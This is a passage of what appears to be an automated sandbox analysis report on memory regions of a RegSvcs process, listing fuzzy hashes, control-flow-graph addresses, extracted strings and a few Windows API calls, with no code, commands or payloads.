                                                      • Opcode Fuzzy Hash: cf2e0f1a1c160e4c8172b3ad83fa75281d715a675f68a2208c34247da747d494
                                                      • Instruction Fuzzy Hash: D3B1B534B042149BCB18AB79946467E7BA7BFC8710B19C93DE406DB385DE349C02CB92
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.3296552684.0000000002EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EA0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_2ea0000_RegSvcs.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: ff44a311b3297068f2b3b9489f694c620fc9d2a5a52d20ace7fb39ba0925a8f3
                                                      • Instruction ID: b08f3adc02a064c7a3295b8417f5fdbc2e6bc75635b6674243c47bac8badeaff
                                                      • Opcode Fuzzy Hash: ff44a311b3297068f2b3b9489f694c620fc9d2a5a52d20ace7fb39ba0925a8f3
                                                      • Instruction Fuzzy Hash: DE53E931D10B1A8ACB11EF68C8546A9F7B1FF99300F11D79AE4587B121EB70AAD5CF81
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.3296552684.0000000002EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EA0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_2ea0000_RegSvcs.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: \VUo
                                                      • API String ID: 0-3530549468
                                                      • Opcode ID: 0cd28ee61d51ffbc6ae0a4a1ef6704fd8b8da6506ab9d5af1b44b6dc60fbf9ec
                                                      • Instruction ID: 8926e29b35cfa320cead5af84af7d1319b60572a03ccce6510129ee27c913c29
                                                      • Opcode Fuzzy Hash: 0cd28ee61d51ffbc6ae0a4a1ef6704fd8b8da6506ab9d5af1b44b6dc60fbf9ec
                                                      • Instruction Fuzzy Hash: 83916DB0E50209CFDF10CFA9C9957DDBBF2AF88308F14D129E415AB294EB74A845CB91
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.3299658233.0000000006B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_6b30000_RegSvcs.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 3c21b3852d4ee26529db55012a139cebc7e0dcad561be4306df920047d1b1af2
                                                      • Instruction ID: e37c6a0ff554fe460a417d5f7c1ebaa2b457d22856dbd03b3f76bc52e39c4971
                                                      • Opcode Fuzzy Hash: 3c21b3852d4ee26529db55012a139cebc7e0dcad561be4306df920047d1b1af2
                                                      • Instruction Fuzzy Hash: 8B924474B002248FDBA4CF68C584AADBBF2FF44314F5584A9D40AAB361DB35ED85CB80
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.3299658233.0000000006B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_6b30000_RegSvcs.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 5ccf29bbb51a9f5939a2b6e647e7092b2f58ef0d7ceaf79d5acc5bf5848825bc
                                                      • Instruction ID: 091b4c43e05454aee5cfc54aa4185256916945e1f0be603e98fe996badaa8025
                                                      • Opcode Fuzzy Hash: 5ccf29bbb51a9f5939a2b6e647e7092b2f58ef0d7ceaf79d5acc5bf5848825bc
                                                      • Instruction Fuzzy Hash: 7462AF74B002259FDB54DF68D554AADB7F2EF88310F1084A9E806EB350EB39ED46CB81
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.3299658233.0000000006B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_6b30000_RegSvcs.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: bf1b7474e2fa19e767f8e38a7e2199669891a60a77dc9f57e37e6dbec8d3942b
                                                      • Instruction ID: b5331f9df2c55e811e579dc0f59ac980acdbcd1d18d951b307d97b9614ddd8fa
                                                      • Opcode Fuzzy Hash: bf1b7474e2fa19e767f8e38a7e2199669891a60a77dc9f57e37e6dbec8d3942b
                                                      • Instruction Fuzzy Hash: E6329F74F002159FDB54DFA8D980AAEBBB2FB88310F109565D905EB395DB38EC42CB91
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.3299658233.0000000006B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_6b30000_RegSvcs.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 6333463995628dfd8d0f44a07d7fb1f1c24794c1ddc787ae88676ce131888435
                                                      • Instruction ID: c1930e3774a12e055773e62d1c4e2c3becc36cd4aeff7b0677dde6964b16c12f
                                                      • Opcode Fuzzy Hash: 6333463995628dfd8d0f44a07d7fb1f1c24794c1ddc787ae88676ce131888435
                                                      • Instruction Fuzzy Hash: 0312E3B2F002259BDB74CF64D88066EB7B2FB85314F2485A9D85ADB341CB34ED42CB91
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.3299658233.0000000006B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_6b30000_RegSvcs.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 356974bc28a37cee73a50912a7f198df336aae83e09eae8450b552fb2beee386
                                                      • Instruction ID: 67505b2d13d7de801f0bb99fb1ebf901a35906952b766f4b5ddcc396cebbaea8
                                                      • Opcode Fuzzy Hash: 356974bc28a37cee73a50912a7f198df336aae83e09eae8450b552fb2beee386
                                                      • Instruction Fuzzy Hash: 29228FB0F002199FDF64CE68D5907ADB7B5FB59310F209966E409EB399CA38DC81CB51
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.3296552684.0000000002EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EA0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_2ea0000_RegSvcs.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: c2f77901b19a3f225cea42a9c66331f76d5067276b4284233c01ee655f3c8680
                                                      • Instruction ID: a818e891ebbb89f12ed2d4ffef72fe00bbc3ea2d272540d6b93abf8dc1e0bc35
                                                      • Opcode Fuzzy Hash: c2f77901b19a3f225cea42a9c66331f76d5067276b4284233c01ee655f3c8680
                                                      • Instruction Fuzzy Hash: F7B16170E402098FDF10CFA8C8A17DDBBF2AF89318F14D529D419EB294EB74A845CB91

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 527 6b3ad48-6b3ad66 528 6b3ad68-6b3ad6b 527->528 529 6b3ad8e-6b3ad91 528->529 530 6b3ad6d-6b3ad89 528->530 531 6b3ad93-6b3ad9c 529->531 532 6b3ada1-6b3ada4 529->532 530->529 531->532 534 6b3ada6-6b3adaa 532->534 535 6b3adb5-6b3adb8 532->535 536 6b3adb0 534->536 537 6b3af74-6b3af7e 534->537 538 6b3adba-6b3adc7 535->538 539 6b3adcc-6b3adcf 535->539 536->535 538->539 540 6b3add1-6b3adda 539->540 541 6b3ade9-6b3adec 539->541 543 6b3ade0-6b3ade4 540->543 544 6b3af7f-6b3af89 540->544 545 6b3adf6-6b3adf9 541->545 546 6b3adee-6b3adf3 541->546 543->541 553 6b3af36-6b3af3b 544->553 554 6b3af8b-6b3af8d 544->554 548 6b3ae13-6b3ae16 545->548 549 6b3adfb-6b3ae0e 545->549 546->545 551 6b3af65-6b3af6e 548->551 552 6b3ae1c-6b3ae1e 548->552 549->548 551->537 551->540 556 6b3ae20 552->556 557 6b3ae25-6b3ae28 552->557 563 6b3af3e-6b3af5b 553->563 558 6b3af3a-6b3af3b 554->558 559 6b3af8f-6b3af90 554->559 556->557 557->528 560 6b3ae2e-6b3ae52 557->560 558->563 562 6b3af93-6b3afb6 559->562 559->563 574 6b3af62 560->574 575 6b3ae58-6b3ae67 560->575 564 6b3afb8-6b3afbb 562->564 563->574 567 6b3afde-6b3afe1 564->567 568 6b3afbd-6b3afd9 564->568 570 6b3afe3-6b3afe7 567->570 571 6b3afee-6b3aff1 567->571 568->567 572 6b3b007-6b3b042 570->572 573 6b3afe9 570->573 576 6b3aff3-6b3affd 571->576 577 6b3affe-6b3b001 571->577 591 6b3b235-6b3b248 572->591 592 6b3b048-6b3b054 572->592 573->571 574->551 589 6b3ae69-6b3ae6f 575->589 590 6b3ae7f-6b3aeba call 6b36618 575->590 577->572 580 6b3b26a-6b3b26d 577->580 584 6b3b26f 580->584 585 6b3b27c-6b3b27e 580->585 656 6b3b26f call 6b3b2a3 584->656 657 6b3b26f call 6b3b25f 584->657 658 6b3b26f call 6b3b24d 584->658 587 6b3b280 585->587 588 6b3b285-6b3b288 585->588 587->588 588->564 593 6b3b28e-6b3b298 588->593 594 6b3ae73-6b3ae75 589->594 595 6b3ae71 589->595 610 6b3aed2-6b3aee9 590->610 611 6b3aebc-6b3aec2 590->611 596 6b3b24a 591->596 600 6b3b056-6b3b06f 592->600 601 6b3b074-6b3b0b8 592->601 594->590 595->590 596->580 597 6b3b275-6b3b277 597->585 600->596 617 6b3b0d4-6b3b113 601->617 618 6b3b0ba-6b3b0cc 601->618 621 6b3af01-6b3af12 610->621 622 6b3aeeb-6b3aef1 610->622 613 6b3aec6-6b3aec8 611->613 614 6b3aec4 611->614 613->610 614->610 626 6b3b1fa-6b3b20f 617->626 627 6b3b119-6b3b1f4 call 6b36618 617->627 618->617 632 6b3af14-6b3af1a 621->632 633 6b3af2a-6b3af33 621->633 624 6b3aef3 622->624 625 6b3aef5-6b3aef7 622->625 624->621 625->621 626->591 627->626 635 6b3af1e-6b3af20 632->635 636 6b3af1c 632->636 633->553 635->633 636->633 656->597 657->597 658->597
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.3299658233.0000000006B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_6b30000_RegSvcs.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: $]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q
                                                      • API String ID: 0-1273862796
                                                      • Opcode ID: cb462bc1237ad29ed1729ee4d1ae955f1c792a2823a6dfcb340e2a05cd9d1de4
                                                      • Instruction ID: 266b693808e8344b10f81d8cea8e31f0125cb70fa90d40b1102529dd7dfc6254
                                                      • Opcode Fuzzy Hash: cb462bc1237ad29ed1729ee4d1ae955f1c792a2823a6dfcb340e2a05cd9d1de4
                                                      • Instruction Fuzzy Hash: CEE16F70F102198FCB69DF68D5906AEB7B6EF84300F208569D849EB354DB38EC46CB91
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.3299658233.0000000006B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_6b30000_RegSvcs.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: $]q$$]q$$]q$$]q$$]q$$]q
                                                      • API String ID: 0-3723351465
                                                      • Opcode ID: 7e59927dada83317d1cf98cf751330ec0aceec3e8b1bf1b2a56766dbfaef6d8a
                                                      • Instruction ID: 0f68fc1c2fdb069d28b5608fe787ef7ddc6f238366d49c759028b7bf0d97dbde
                                                      • Opcode Fuzzy Hash: 7e59927dada83317d1cf98cf751330ec0aceec3e8b1bf1b2a56766dbfaef6d8a
                                                      • Instruction Fuzzy Hash: 4002BEB0F0022A9FDB64CF68D590AADB7B1FF95300F1099AAD409DB259DB34ED45CB81

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 957 6b391c0-6b391e5 958 6b391e7-6b391ea 957->958 959 6b39210-6b39213 958->959 960 6b391ec-6b3920b 958->960 961 6b39ad3-6b39ad5 959->961 962 6b39219-6b3922e 959->962 960->959 963 6b39ad7 961->963 964 6b39adc-6b39adf 961->964 968 6b39230-6b39236 962->968 969 6b39246-6b3925c 962->969 963->964 964->958 967 6b39ae5-6b39aef 964->967 971 6b3923a-6b3923c 968->971 972 6b39238 968->972 974 6b39267-6b39269 969->974 971->969 972->969 975 6b39281-6b392f2 974->975 976 6b3926b-6b39271 974->976 987 6b392f4-6b39317 975->987 988 6b3931e-6b3933a 975->988 977 6b39273 976->977 978 6b39275-6b39277 976->978 977->975 978->975 987->988 993 6b39366-6b39381 988->993 994 6b3933c-6b3935f 988->994 999 6b39383-6b393a5 993->999 1000 6b393ac-6b393c7 993->1000 994->993 999->1000 1005 6b393f2-6b393fc 1000->1005 1006 6b393c9-6b393eb 1000->1006 1007 6b393fe-6b39407 1005->1007 1008 6b3940c-6b39486 1005->1008 1006->1005 1007->967 1014 6b394d3-6b394e8 1008->1014 1015 6b39488-6b394a6 1008->1015 1014->961 1019 6b394c2-6b394d1 1015->1019 1020 6b394a8-6b394b7 1015->1020 1019->1014 1019->1015 1020->1019
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.3299658233.0000000006B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_6b30000_RegSvcs.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: $]q$$]q$$]q$$]q
                                                      • API String ID: 0-858218434
                                                      • Opcode ID: 6992436791a0e9251ebe2e27c8aed44b532324089349956f0101aa25eda16a25
                                                      • Instruction ID: 5043330ee61cd75a1eca03abc341e2bc78611ab02aa97ed8cafe7a46c38184b0
                                                      • Opcode Fuzzy Hash: 6992436791a0e9251ebe2e27c8aed44b532324089349956f0101aa25eda16a25
                                                      • Instruction Fuzzy Hash: 7E915070F0061A9FDB54DF69D950BAEB3F6FF84204F108565C809EB384EAB4DD468B92

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 1023 6b3cfb8-6b3cfd3 1024 6b3cfd5-6b3cfd8 1023->1024 1025 6b3d4a4-6b3d4b0 1024->1025 1026 6b3cfde-6b3cfe1 1024->1026 1029 6b3d4b6-6b3d7a3 1025->1029 1030 6b3d26e-6b3d27d 1025->1030 1027 6b3cfe3-6b3cfe5 1026->1027 1028 6b3cff0-6b3cff3 1026->1028 1031 6b3d4a1 1027->1031 1032 6b3cfeb 1027->1032 1033 6b3d002-6b3d005 1028->1033 1034 6b3cff5-6b3cff7 1028->1034 1235 6b3d9ca-6b3d9d4 1029->1235 1236 6b3d7a9-6b3d7af 1029->1236 1035 6b3d27f-6b3d284 1030->1035 1036 6b3d28c-6b3d298 1030->1036 1031->1025 1032->1028 1039 6b3d007-6b3d049 1033->1039 1040 6b3d04e-6b3d051 1033->1040 1037 6b3d35f-6b3d368 1034->1037 1038 6b3cffd 1034->1038 1035->1036 1041 6b3d9d5-6b3da0e 1036->1041 1042 6b3d29e-6b3d2b0 1036->1042 1046 6b3d377-6b3d383 1037->1046 1047 6b3d36a-6b3d36f 1037->1047 1038->1033 1039->1040 1044 6b3d053-6b3d095 1040->1044 1045 6b3d09a-6b3d09d 1040->1045 1059 6b3da10-6b3da13 1041->1059 1060 6b3d2b5-6b3d2b8 1042->1060 1044->1045 1048 6b3d0e6-6b3d0e9 1045->1048 1049 6b3d09f-6b3d0e1 1045->1049 1052 6b3d494-6b3d499 1046->1052 1053 6b3d389-6b3d39d 1046->1053 1047->1046 1057 6b3d132-6b3d135 1048->1057 1058 6b3d0eb-6b3d12d 1048->1058 1049->1048 1052->1031 1053->1031 1080 6b3d3a3-6b3d3b5 1053->1080 1063 6b3d152-6b3d155 1057->1063 1064 6b3d137-6b3d14d 1057->1064 1058->1057 1068 6b3da46-6b3da49 1059->1068 1069 6b3da15-6b3da41 1059->1069 1070 6b3d301-6b3d304 1060->1070 1071 6b3d2ba-6b3d2fc 1060->1071 1075 6b3d157-6b3d15c 1063->1075 1076 6b3d15f-6b3d162 1063->1076 1064->1063 1077 6b3da4b call 6b3db2d 1068->1077 1078 6b3da58-6b3da5b 1068->1078 1069->1068 1073 6b3d306-6b3d348 1070->1073 1074 6b3d34d-6b3d34f 1070->1074 1071->1070 1073->1074 1089 6b3d351 1074->1089 1090 6b3d356-6b3d359 1074->1090 1075->1076 1083 6b3d164-6b3d173 1076->1083 1084 6b3d1ab-6b3d1ae 1076->1084 1098 6b3da51-6b3da53 1077->1098 1085 6b3da7e-6b3da80 1078->1085 1086 6b3da5d-6b3da79 1078->1086 1104 6b3d3b7-6b3d3bd 1080->1104 1105 6b3d3d9-6b3d3db 1080->1105 1096 6b3d182-6b3d18e 1083->1096 1097 6b3d175-6b3d17a 1083->1097 1099 6b3d1b0-6b3d1f2 1084->1099 1100 6b3d1f7-6b3d1fa 1084->1100 1101 6b3da82 1085->1101 1102 6b3da87-6b3da8a 1085->1102 1086->1085 1089->1090 1090->1024 1090->1037 1096->1041 1110 6b3d194-6b3d1a6 1096->1110 1097->1096 1098->1078 1099->1100 1107 6b3d243-6b3d246 1100->1107 1108 6b3d1fc-6b3d23e 1100->1108 1101->1102 1102->1059 1114 6b3da8c-6b3da9b 1102->1114 1116 6b3d3c1-6b3d3cd 1104->1116 1117 6b3d3bf 1104->1117 1127 6b3d3e5-6b3d3f1 1105->1127 1120 6b3d269-6b3d26c 1107->1120 1121 6b3d248-6b3d264 1107->1121 1108->1107 1110->1084 1139 6b3db02-6b3db17 1114->1139 1140 6b3da9d-6b3db00 call 6b36618 1114->1140 1124 6b3d3cf-6b3d3d7 1116->1124 1117->1124 1120->1030 1120->1060 1121->1120 1124->1127 1150 6b3d3f3-6b3d3fd 1127->1150 1151 6b3d3ff 1127->1151 1140->1139 1158 6b3d404-6b3d406 1150->1158 1151->1158 1158->1031 1162 6b3d40c-6b3d428 call 6b36618 1158->1162 1175 6b3d437-6b3d443 1162->1175 1176 6b3d42a-6b3d42f 1162->1176 1175->1052 1178 6b3d445-6b3d492 1175->1178 1176->1175 1178->1031 1237 6b3d7b1-6b3d7b6 1236->1237 1238 6b3d7be-6b3d7c7 1236->1238 1237->1238 1238->1041 1239 6b3d7cd-6b3d7e0 1238->1239 1241 6b3d7e6-6b3d7ec 1239->1241 1242 6b3d9ba-6b3d9c4 1239->1242 1243 6b3d7fb-6b3d804 1241->1243 1244 6b3d7ee-6b3d7f3 1241->1244 1242->1235 1242->1236 1243->1041 1245 6b3d80a-6b3d82b 1243->1245 1244->1243 1248 6b3d83a-6b3d843 1245->1248 1249 6b3d82d-6b3d832 1245->1249 1248->1041 1250 6b3d849-6b3d866 1248->1250 1249->1248 1250->1242 1253 6b3d86c-6b3d872 1250->1253 1253->1041 1254 6b3d878-6b3d891 1253->1254 1256 6b3d897-6b3d8be 1254->1256 1257 6b3d9ad-6b3d9b4 1254->1257 1256->1041 1260 6b3d8c4-6b3d8ce 1256->1260 1257->1242 1257->1253 1260->1041 1261 6b3d8d4-6b3d8eb 1260->1261 1263 6b3d8fa-6b3d915 1261->1263 1264 6b3d8ed-6b3d8f8 1261->1264 1263->1257 1269 6b3d91b-6b3d934 call 6b36618 1263->1269 1264->1263 1273 6b3d943-6b3d94c 1269->1273 1274 6b3d936-6b3d93b 1269->1274 1273->1041 1275 6b3d952-6b3d9a6 1273->1275 1274->1273 1275->1257
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.3299658233.0000000006B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_6b30000_RegSvcs.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: $]q$$]q$$]q
                                                      • API String ID: 0-182748909
                                                      • Opcode ID: 03e739c815d7820f9497735250e9fcf1ae65a06956d4a9f91a9ac982659163d0
                                                      • Instruction ID: 7a28ba178e1588a8842d2855d6083a2c587c9fbc526acd80218af0532563b028
                                                      • Opcode Fuzzy Hash: 03e739c815d7820f9497735250e9fcf1ae65a06956d4a9f91a9ac982659163d0
                                                      • Instruction Fuzzy Hash: A8628F7470021A8FCB55EF68D690A5EB7B6FF84304B208A78D4059F359DB78ED4ACB81

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 1283 6b34c10-6b34c34 1284 6b34c36-6b34c39 1283->1284 1285 6b34c3b-6b34c55 1284->1285 1286 6b34c5a-6b34c5d 1284->1286 1285->1286 1287 6b34c63-6b34d5b 1286->1287 1288 6b3533c-6b3533e 1286->1288 1306 6b34d61-6b34dae call 6b354b8 1287->1306 1307 6b34dde-6b34de5 1287->1307 1289 6b35340 1288->1289 1290 6b35345-6b35348 1288->1290 1289->1290 1290->1284 1292 6b3534e-6b3535b 1290->1292 1320 6b34db4-6b34dd0 1306->1320 1308 6b34deb-6b34e5b 1307->1308 1309 6b34e69-6b34e72 1307->1309 1326 6b34e66 1308->1326 1327 6b34e5d 1308->1327 1309->1292 1323 6b34dd2 1320->1323 1324 6b34ddb 1320->1324 1323->1324 1324->1307 1326->1309 1327->1326
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.3299658233.0000000006B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_6b30000_RegSvcs.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: fbq$XPbq$\Obq
                                                      • API String ID: 0-4057264190
                                                      • Opcode ID: 0a37ad280ae0f6494e893fb56955fe99c4e32cc2140d6d314d7dd095ebc6dd2a
                                                      • Instruction ID: b7c84f2ab4162484edafffd3c46f9c980186f700172ba5f75f1aadc412e52101
                                                      • Opcode Fuzzy Hash: 0a37ad280ae0f6494e893fb56955fe99c4e32cc2140d6d314d7dd095ebc6dd2a
                                                      • Instruction Fuzzy Hash: 8E619F70F002199FEB549FA8C8547AEBBF6FF88700F208429D50AEB390DB798D458B51

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 2309 6b391b3-6b391e5 2310 6b391e7-6b391ea 2309->2310 2311 6b39210-6b39213 2310->2311 2312 6b391ec-6b3920b 2310->2312 2313 6b39ad3-6b39ad5 2311->2313 2314 6b39219-6b3922e 2311->2314 2312->2311 2315 6b39ad7 2313->2315 2316 6b39adc-6b39adf 2313->2316 2320 6b39230-6b39236 2314->2320 2321 6b39246-6b3925c 2314->2321 2315->2316 2316->2310 2319 6b39ae5-6b39aef 2316->2319 2323 6b3923a-6b3923c 2320->2323 2324 6b39238 2320->2324 2326 6b39267-6b39269 2321->2326 2323->2321 2324->2321 2327 6b39281-6b392f2 2326->2327 2328 6b3926b-6b39271 2326->2328 2339 6b392f4-6b39317 2327->2339 2340 6b3931e-6b3933a 2327->2340 2329 6b39273 2328->2329 2330 6b39275-6b39277 2328->2330 2329->2327 2330->2327 2339->2340 2345 6b39366-6b39381 2340->2345 2346 6b3933c-6b3935f 2340->2346 2351 6b39383-6b393a5 2345->2351 2352 6b393ac-6b393c7 2345->2352 2346->2345 2351->2352 2357 6b393f2-6b393fc 2352->2357 2358 6b393c9-6b393eb 2352->2358 2359 6b393fe-6b39407 2357->2359 2360 6b3940c-6b39486 2357->2360 2358->2357 2359->2319 2366 6b394d3-6b394e8 2360->2366 2367 6b39488-6b394a6 2360->2367 2366->2313 2371 6b394c2-6b394d1 2367->2371 2372 6b394a8-6b394b7 2367->2372 2371->2366 2371->2367 2372->2371
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.3299658233.0000000006B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_6b30000_RegSvcs.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: $]q$$]q
                                                      • API String ID: 0-127220927
                                                      • Opcode ID: 08404ed52aa3dd705f3024ac18dcc0d3012832022f709a2176d6bc7f9af0035d
                                                      • Instruction ID: 977d48a7854a5ef510e6241ba16d1f7885f369f521f2f44f7db45a42e192007b
                                                      • Opcode Fuzzy Hash: 08404ed52aa3dd705f3024ac18dcc0d3012832022f709a2176d6bc7f9af0035d
                                                      • Instruction Fuzzy Hash: BD516E70B005169FDB54DF78D950B6EB3F6EB88204F108469C809EB394EAB9DC468B92

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 2375 6b34c00-6b34c34 2377 6b34c36-6b34c39 2375->2377 2378 6b34c3b-6b34c55 2377->2378 2379 6b34c5a-6b34c5d 2377->2379 2378->2379 2380 6b34c63-6b34d5b 2379->2380 2381 6b3533c-6b3533e 2379->2381 2399 6b34d61-6b34dae call 6b354b8 2380->2399 2400 6b34dde-6b34de5 2380->2400 2382 6b35340 2381->2382 2383 6b35345-6b35348 2381->2383 2382->2383 2383->2377 2385 6b3534e-6b3535b 2383->2385 2413 6b34db4-6b34dd0 2399->2413 2401 6b34deb-6b34e5b 2400->2401 2402 6b34e69-6b34e72 2400->2402 2419 6b34e66 2401->2419 2420 6b34e5d 2401->2420 2402->2385 2416 6b34dd2 2413->2416 2417 6b34ddb 2413->2417 2416->2417 2417->2400 2419->2402 2420->2419
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.3299658233.0000000006B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_6b30000_RegSvcs.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: fbq$XPbq
                                                      • API String ID: 0-2292610095
                                                      • Opcode ID: 239912a55386a83b668a18ec1a9b3fa636e78caafe4d34520d071a69e5290904
                                                      • Instruction ID: eae0df53c217778f92b2ed3c0fc9fc2382510f8fbd3f2b47f3d5e2fd186babce
                                                      • Opcode Fuzzy Hash: 239912a55386a83b668a18ec1a9b3fa636e78caafe4d34520d071a69e5290904
                                                      • Instruction Fuzzy Hash: D3519E70F002199FDB549FA9C854BAEBBF6FF88700F208529D506EB394DB798C458B91
                                                      APIs
                                                      • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 06B2D622
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.3299620669.0000000006B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B20000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_6b20000_RegSvcs.jbxd
                                                      Similarity
                                                      • API ID: CreateWindow
                                                      • String ID:
                                                      • API String ID: 716092398-0
                                                      • Opcode ID: 6373d30129418f8a984e0b4883c49f846a99446ea9dfc7669b010f23aa6c55ae
                                                      • Instruction ID: da8ce6a59daa090b0f6f6f10d579fb467b7d22a9f19ed2c5efe11272f83a5189
                                                      • Opcode Fuzzy Hash: 6373d30129418f8a984e0b4883c49f846a99446ea9dfc7669b010f23aa6c55ae
                                                      • Instruction Fuzzy Hash: E151CEB1D003199FDB14CF9AC884ADEBBF5FF48310F24856AE818AB210D775A885CF90
                                                      APIs
                                                      • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 06B2D622
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.3299620669.0000000006B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B20000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_6b20000_RegSvcs.jbxd
                                                      Similarity
                                                      • API ID: CreateWindow
                                                      • String ID:
                                                      • API String ID: 716092398-0
                                                      • Opcode ID: 7d1f73032b8711183043935bdb26d4bda1a758f9ae7428d18a41ec49e85ee562
                                                      • Instruction ID: 3c3e0549da84299048acd73b6d3e480752f98ab0e22515511c94b8dfae715b5e
                                                      • Opcode Fuzzy Hash: 7d1f73032b8711183043935bdb26d4bda1a758f9ae7428d18a41ec49e85ee562
                                                      • Instruction Fuzzy Hash: B541BEB1D003599FDB14CF9AD884ADEBBF5FF48310F24856AE818AB250D775A885CF90
                                                      APIs
                                                      • CallWindowProcW.USER32(?,?,?,?,?), ref: 06B2FD11
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.3299620669.0000000006B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B20000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_6b20000_RegSvcs.jbxd
                                                      Similarity
                                                      • API ID: CallProcWindow
                                                      • String ID:
                                                      • API String ID: 2714655100-0
                                                      • Opcode ID: a82fac86ba74a6a51bad2f7842eb1f936ef00f60536f837d764118f059a656d3
                                                      • Instruction ID: 9bd92732fe66dbc300fdcf8e3a3379156e713ee967aab1f1245c1cd1e107b940
                                                      • Opcode Fuzzy Hash: a82fac86ba74a6a51bad2f7842eb1f936ef00f60536f837d764118f059a656d3
                                                      • Instruction Fuzzy Hash: 37416DB4900315CFDB54CF99C448AAABBF9FF88710F24C499D519A7321C774A841CFA0
                                                      APIs
